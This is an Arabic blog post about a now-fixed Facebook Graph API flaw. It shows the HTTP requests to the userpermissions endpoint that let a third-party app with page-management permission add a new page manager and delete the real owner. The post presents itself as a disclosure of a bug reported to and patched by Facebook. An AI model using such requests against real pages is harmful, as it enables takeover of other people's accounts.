Jannah Theme License is not validated, Go to the theme options page to validate the license, You need a single license for each domain name.

ثغرة جديدة خطيرة لإختراق صفحات Facebook

تسمح الثغرة الأمنية في نقطة نهاية Facebook business manager لأحد تطبيقات الطرف الثالث باختراق صفحة حساب Facebook بأذونات محدودة وسيفقد الضحية وصول المشرف نهائيًا إلى الصفحة.

بشكل افتراضي ، لا تسمح واجهة تطبيق Facebook لتطبيقات الجهات الخارجية بإضافة أو تعديل أدوار مسؤول الصفحة (أدوار الصفحة مثل مدير أو محرر أو محلل إلخ). يُسمح لتطبيقات الجهات الخارجية بتنفيذ جميع العمليات مثل حالات النشر نيابة عنك ، ونشر الصور ، وما إلى ذلك باستثناء إضافة أدوار المشرف لأنه إذا سمح للتطبيق بإضافة مدراء أو إزالتهم ، فقد يضيف بعض المستخدمين كمسؤول إلى الصفحة وإزالة المالك الفعلي بشكل دائم.

صورة لـ ثغرة جديدة خطيرة لإختراق صفحات Facebook | hacking-facebook-pages-DzTechs

من ناحية أخرى ، هناك نقطة نهاية لصفحات العمل تدعى userpermissions والتي تسمح بإضافة أو إزالة أدوار مسؤولي صفحة العمل الذين يتعاملون بالفعل مع أعمال Facebook.

الطلب التالي سيجعل المستخدم المستهدف هو المشرف على الصفحة.

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host : graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<application_access_token>

Response:-
true

بعد بضع دقائق من الاختبار ، تعرفت على أن إزالة معلمة العمل من الطلب لم تتسبب في أي خطأ وتسمح لنا بإضافة أي شخص كمسؤول جديد للصفحة وحذف مسؤول الصفحة الفعلي على الصفحة غير التجارية حيث التطبيق لديه إذن إدارة.

هذا هو! أيا كان التطبيق ، إذا كان لديه إذن manager_pages من المسؤول ، فيمكنه اختراق جميع صفحات حسابه على Facebook في غضون ثوانٍ معدودة.

الاستيلاء على الصفحة:

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host : graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<application_access_token>
true

إزالة الضحية:

Request :-
Delete /<page_id>/userpermissions HTTP/1.1
Host : graph.facebook.com 
Content-Length: 245
user=<target_user_id>&access_token=<application_access_token>

Response:-
true

هذا كل شئ! تم اختراق الصفحة المستهدفة!

تم الإبلاغ عن مشكلة عدم الحصانة هذه أمام فريق أمان Facebook وتم حلها تمامًا الآن.

سوف يبدو مربع حوار الأذونات هكذا

صورة لـ ثغرة جديدة خطيرة لإختراق صفحات Facebook | Capture-DzTechs

إذا تم طلب manager_pages ، يرجى ملاحظة أن هذا التطبيق سيكون قادرًا على إدارة صفحاتك (نشر الحالات ، نشر الصور ، إلخ.)

مقالات ذات صلة

لا يحتاج الأشخاص للقلق ، فلا يزال بإمكانك تعديل الأذونات التي منحتها للتطبيقات الأخرى هنا.

يمكنك أيضًا قراءة كيفية كسب المال من خلال المدونات في مقالتنا. إنه دليل A-Z على التدوين يساعدك في الحصول على أول شيك لك.

الوسوم
FaceBook
زر الذهاب إلى الأعلى